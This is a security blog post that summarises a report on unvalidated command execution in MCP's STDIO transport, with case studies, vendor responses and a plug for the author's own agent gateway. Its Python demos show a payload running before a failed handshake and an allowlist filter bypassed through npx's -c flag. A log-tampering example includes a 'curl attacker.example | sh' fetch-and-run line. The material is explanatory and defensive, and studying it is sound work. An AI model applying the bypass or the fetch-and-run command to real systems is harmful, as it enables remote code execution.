Ox Security Report: Anthropic MCP is Execute First, Validate Never

OX Security published a report today that lands directly in the growing storm about Anthropic’s risk management practices. To put it bluntly, a systemic vulnerability sits at the core of Anthropic’s Model Context Protocol (MCP).

The finding is simple. MCP’s STDIO transport accepts arbitrary command strings and passes them directly to subprocess execution.

Yup.

No validation.
No sanitization.
No sandboxing.
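To make the pattern concrete, here is a minimal Python sketch of what an unvalidated STDIO launch amounts to. It is not code from any official SDK. The function name `launch_stdio_server` is hypothetical, and the `command`/`args` config shape is an assumption modeled on the fields common in MCP client config files. The point is what’s missing: nothing between reading the config and spawning the process looks at what is being spawned.

```python
import subprocess
import sys


def launch_stdio_server(config: dict) -> subprocess.Popen:
    """Hypothetical STDIO launcher: spawn whatever the config names.

    Deliberately no validation, mirroring the behavior OX describes:
    the command string and its args go straight to the OS.
    """
    argv = [config["command"], *config.get("args", [])]
    return subprocess.Popen(
        argv,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True,
    )


if __name__ == "__main__":
    # Any binary and any arguments are accepted; here, a harmless one-liner.
    config = {"command": sys.executable, "args": ["-c", "print('not an MCP server')"]}
    proc = launch_stdio_server(config)
    out, _ = proc.communicate(timeout=10)
    print(out.strip())  # prints "not an MCP server"
```

Swap the harmless one-liner for any other binary and the launcher won’t notice.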

It gets worse. The command runs even when the MCP server fails to start. The process executes first, then the MCP handshake tries to validate it as a legitimate server, then the handshake fails, then the error gets caught. But the payload already ran. Execute first, validate second. “Fire, ready, aim” fails any threat model.
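Here is a minimal, hypothetical Python sketch of that ordering. The client spawns the configured process, then sends a JSON-RPC `initialize` request as its handshake. The child is just a payload that writes a marker file and never speaks MCP. The function name `connect_stdio`, the simplified handshake check, and the marker file are assumptions for illustration; real SDK clients do more work, but per OX the spawn still comes first.

```python
import json
import os
import subprocess
import sys
import tempfile


def connect_stdio(argv: list[str]) -> dict:
    """Hypothetical client: spawn the process first, validate it second."""
    # Step 1: the process starts. Whatever it does on startup happens now.
    proc = subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True)
    # Step 2: try a simplified JSON-RPC "initialize" handshake over stdio.
    request = {"jsonrpc": "2.0", "id": 1, "method": "initialize", "params": {}}
    try:
        out, _ = proc.communicate(json.dumps(request) + "\n", timeout=10)
        first_line = out.splitlines()[0] if out else ""
        reply = json.loads(first_line)  # ValueError on empty or non-JSON output
        if not isinstance(reply, dict) or reply.get("id") != 1 or "result" not in reply:
            raise ValueError("reply is not an initialize result")
        return reply
    except (ValueError, subprocess.TimeoutExpired) as exc:
        # Step 3: the handshake fails and the error is caught, after the fact.
        proc.kill()
        proc.wait()
        raise ConnectionError(f"handshake failed: {exc}") from exc


if __name__ == "__main__":
    marker = os.path.join(tempfile.mkdtemp(), "payload_ran")
    # The "server" is only a payload: it writes a file and never speaks MCP.
    payload = f"open({marker!r}, 'w').write('owned')"
    try:
        connect_stdio([sys.executable, "-c", payload])
    except ConnectionError as err:
        print("client caught:", err)
    print("payload ran anyway:", os.path.exists(marker))  # payload ran anyway: True
```

The client reports a failed handshake, and the marker file exists anyway. Catching the error cleans up the connection, not the damage.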

Every developer who builds on Anthropic’s MCP inherits the exposure, because the behavior is present in all ten official MCP language SDKs: Python, TypeScript, Java, Kotlin, C#, Go, Ruby, Swift, PHP, and Rust.

OX POC Numbers

The OX Research team’s report shows they executed commands on six production platforms with paying customers. They took over thousands of public servers spanning more than 200 popular open-source GitHub projects. They uploaded a proof-of-concept malicious MCP server to 9 of 11 major MCP marketplaces.

Not a single marketplace caught it.

The case studies are where it gets really interesting.

LangFlow: 915 publicly accessible instances on Shodan, unauthenticated session tokens, full server takeover and data exfiltration without ever logging in.
Letta AI: authenticated users could substitute a valid STDIO payload via man-in-the-middle, achieving arbitrary command execution on production servers.
Windsurf: prompt injection to local RCE with zero clicks, assigned CVE-2026-30615.
Flowise: the most important case. Flowise actually did what Anthropic says developers should do. They implemented input filtering. Specific commands only. Special characters stripped. And then? OX bypassed it in a single step using npx’s -c flag. When the architecture permits arbitrary subprocess execution, application-layer filtering is a wet paper bag. The “developer responsibility” defense just lost a whole lot of trust.
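The exact filter rules Flowise shipped aren’t described here, so the following Python sketch is hypothetical: an allowlist of launcher names plus shell-metacharacter stripping, roughly the shape described above. It never executes anything; it only shows what the filter lets through. The names `ALLOWED_COMMANDS`, `SHELL_METACHARS`, and `sanitize` are illustrative.

```python
import re

# Hypothetical application-layer filter: specific launchers only,
# special characters stripped from every argument.
ALLOWED_COMMANDS = {"node", "npx"}
SHELL_METACHARS = re.compile(r"[;&|`$<>(){}\\\n]")


def sanitize(command: str, args: list[str]) -> tuple[str, list[str]]:
    """Reject non-allowlisted commands and strip metacharacters from args."""
    if command not in ALLOWED_COMMANDS:
        raise PermissionError(f"command not allowed: {command}")
    return command, [SHELL_METACHARS.sub("", a) for a in args]


if __name__ == "__main__":
    # Passes untouched: "npx" is allowlisted and the payload has no
    # metacharacters. But npx's -c flag runs its argument as a command.
    cmd, args = sanitize("npx", ["-c", "touch owned"])
    print(cmd, args)  # npx ['-c', 'touch owned']
```

The payload needs no metacharacters at all, because npx’s -c flag turns an allowlisted launcher into a command runner. Any allowlisted interpreter with an equivalent flag (node -e, python -c) has the same problem.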

The obvious objection to LangFlow is that 915 instances of a tool designed for local deployment ended up on the public internet, and that’s a configuration failure, not a protocol failure. OK, fine. That is why the Flowise case is up there too. Flowise did the right thing. They implemented filtering in the intended local context. It didn’t work. The design flaw defeated the shift of responsibility.

We can apply this generally to the world of MCP and think in big, big terms. Anthropic’s MCP Python SDK alone accounts for 73 million downloads. The third-party projects that depend on it push the aggregate higher: 57 million for LiteLLM, 22 million for FastMCP. Over 32,000 dependent repositories. Not all of those are Anthropic’s code, but all of them inherit Anthropic’s architectural decision.

OX confirmed 7,374 vulnerable public servers on Shodan, out of more than 200,000 estimated to be exposed. That’s a meaningful number for a company gathering headlines about a $100 million vulnpocalypse in OTHER people’s software.

Anthropic Response

OX contacted Anthropic on January 7, 2026, and got this statement:

This is an explicit part of how stdio MCP servers work and we believe that this design does represent a secure default.

LangChain’s response:

It is the responsibility of the application author to validate and sanitize inputs from untrusted sources.

FastMCP’s response:

We don’t consider this a vulnerability. stdio transport spawns a subprocess by design, per the MCP specification.

Google’s Gemini-CLI:

Known issue, no CVE, no fix planned near-term.

Cursor:

By design. User must click accept on mcp.json edit.

Clearly, when five independent organizations float the same answer, threat modeling is not getting deep or diverse thought. I’m having flashbacks to the old “Telnet is everywhere” days. Apparently MCP comes with an industry-wide expectation that architectural insecurity will drift onto someone else.

At least we can see that, after OX’s initial report, Anthropic quietly updated its SECURITY.md to recommend that MCP adapters, specifically STDIO ones, “should be used with caution.”


A documentation change. Not a code change. The vulnerability is there for you to step on like a land mine under a treadmill. The responsibility is not where it should be. The question is why.

Contrast to Glasswing

Anthropic just launched Project Glasswing, a $100 million cybersecurity initiative using its unreleased Mythos model to find zero-day vulnerabilities in everyone else’s software. AWS, Apple, Google, Microsoft, and CrowdStrike are official participants and are promoting their involvement.

Anthropic is positioning itself as the entity that will secure the software ecosystem. Why would you trust a company to find vulnerabilities in your code when it classifies arbitrary command execution in its own protocol as expected behavior?

The conflict is not that Glasswing exists while MCP is insecure. The conflict is that Glasswing’s value proposition requires exactly the kind of belt-and-suspenders “secure by default” thinking that Anthropic refuses to apply at all with MCP. Can they really sell everyone on a standard they refuse to meet?

OX proposed four specific fixes that would have propagated protection instantly to every downstream library and project:

Manifest-only execution to replace arbitrary command strings
Command allowlisting to block high-risk binaries by default
A mandatory dangerous-mode opt-in flag for any STDIO configuration using dynamic arguments
Marketplace verification standards requiring security manifests signed by verified developer identity
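OX’s list describes properties, not an API. Below is one hypothetical way the first three could compose in a Python client launcher: the config may only name a server, the launcher looks up a pre-vetted argv, high-risk binaries are left off the allowlist by default, and extra arguments require an explicit `dangerous=True`. The manifest format, paths, `resolve_launch`, and the high-risk set are all assumptions. Signature verification for marketplace manifests (the fourth fix) is out of scope; the sketch assumes the manifest was already verified.

```python
import os
from dataclasses import dataclass
from typing import Sequence


@dataclass(frozen=True)
class ManifestEntry:
    """Hypothetical manifest entry: a fixed, pre-vetted launch command."""
    binary: str
    fixed_args: tuple[str, ...] = ()


# Assumption: loaded from an already-verified, signed manifest.
MANIFEST = {
    "weather": ManifestEntry("/opt/mcp/weather-server", ("--stdio",)),
    "helper": ManifestEntry("/usr/bin/npx", ("some-mcp-package",)),
}

# Launchers and interpreters that can run arbitrary code.
HIGH_RISK = {"sh", "bash", "zsh", "cmd", "powershell", "npx", "node", "python", "python3"}

# Default allowlist: every manifest binary except high-risk launchers.
ALLOWED_BINARIES = {
    e.binary for e in MANIFEST.values() if os.path.basename(e.binary) not in HIGH_RISK
}


def resolve_launch(server: str, extra_args: Sequence[str] = (), dangerous: bool = False) -> list[str]:
    """Return the argv to spawn for a named server, or raise PermissionError."""
    entry = MANIFEST.get(server)
    if entry is None:
        # Manifest-only: no raw command strings, only known server names.
        raise PermissionError(f"{server!r} is not in the manifest")
    if entry.binary not in ALLOWED_BINARIES:
        raise PermissionError(f"{entry.binary} is not allowlisted")
    if extra_args and not dangerous:
        # Dynamic arguments are where payloads hide: require explicit opt-in.
        raise PermissionError("dynamic arguments require dangerous=True")
    return [entry.binary, *entry.fixed_args, *extra_args]


if __name__ == "__main__":
    print(resolve_launch("weather"))  # ['/opt/mcp/weather-server', '--stdio']
    for server, args in [("unknown", ()), ("helper", ()), ("weather", ("-c", "id"))]:
        try:
            resolve_launch(server, args)
        except PermissionError as err:
            print("refused:", err)
```

Because the check lives in the launcher rather than in each application, every project built on it would inherit the protection, which is the propagation argument OX makes.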

Anthropic declined all four. The company is spending $100 million to find other people’s decades-old bugs with Mythos. Fixing the architectural flaw in its own protocol from 2024 apparently does not qualify.

OX calls Anthropic’s approach “Fault-Diversion”: pushing the burden of complex security sanitization onto downstream developers. Their framing is generous. This ain’t my first rodeo, so I recognize this pattern. A company understands the problem. Has the resources to fix it. Receives concrete proposed solutions. Declines all of them. Updates a document. Then shifts responsibility to implementers, which obscures who created the problem.

Lay My Body to Rest On the Hill of Secure by Default

The proposed remediation list from OX reads like a requirements document for Wirken, the secure agent gateway I built to address exactly this class of problem. CISOs often know “this is not how things should be done,” but they lack a pivot. What they really need is something to point at that proves it can be done differently.

Attack Surface	MCP default	MCP behind Wirken
Command execution	Arbitrary strings passed to subprocess, no filtering	Docker/gVisor/Wasm sandbox, graduated permissions, shell exec requires approval, approvals expire after 30 days by default
Audit trail	None	Append-only hash-chained log, SHA-256 tamper detection, SIEM forwarding to Datadog/Splunk/webhook in real time
Identity verification	No identity or signing in the STDIO transport specification	Each channel runs as an isolated process with its own Ed25519 identity over Unix domain sockets via Cap’n Proto
Credential storage	Exposed (primary exfiltration target in OX findings)	Encrypted at rest with XChaCha20-Poly1305, keyed from OS keychain
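The hash-chained log in the table is a well-known construction. Here is a minimal Python sketch of the general idea using only the standard library; it is not Wirken’s actual log format, and `append_entry`, `verify_chain`, and the entry fields are hypothetical. Each entry’s SHA-256 covers the previous entry’s hash plus a canonical JSON encoding of the event, so editing any earlier entry breaks every hash after it.

```python
import hashlib
import json

GENESIS = "0" * 64  # placeholder "previous hash" for the first entry


def _digest(prev_hash: str, event: dict) -> str:
    """SHA-256 over the previous hash plus a canonical JSON encoding of the event."""
    body = json.dumps(event, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append_entry(log: list[dict], event: dict) -> dict:
    """Append an event, chaining it to the hash of the previous entry."""
    prev = log[-1]["hash"] if log else GENESIS
    entry = {"prev": prev, "event": event, "hash": _digest(prev, event)}
    log.append(entry)
    return entry


def verify_chain(log: list[dict]) -> bool:
    """Recompute every link; any edited, removed, or reordered entry fails."""
    prev = GENESIS
    for entry in log:
        if entry["prev"] != prev or entry["hash"] != _digest(prev, entry["event"]):
            return False
        prev = entry["hash"]
    return True


if __name__ == "__main__":
    log: list[dict] = []
    append_entry(log, {"action": "shell_exec", "cmd": "ls", "approved": True})
    append_entry(log, {"action": "tool_call", "tool": "weather"})
    print(verify_chain(log))  # True
    log[0]["event"]["cmd"] = "curl attacker.example | sh"  # tamper with history
    print(verify_chain(log))  # False
```

One design caveat: an attacker who can rewrite the whole file can recompute the chain from the tampered point on. Shipping each head hash off-box as it is written (the SIEM forwarding in the table) is what makes that kind of rewrite detectable.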

Secure-by-default agent execution is NOT aspirational. It should be the baseline. That’s why I open-sourced Wirken, so anyone can pull it and play with it. When a CISO asks “what ships today” for MCP security, it’s right there. Single static binary. The architectural choices OX is asking Anthropic to make are already available in Wirken.

Credit to OX for doing the work and setting the record straight. Their full report is available here: The Mother of All AI Supply Chains.

flyingpenguin

a blog about the poetry of information security, since 1995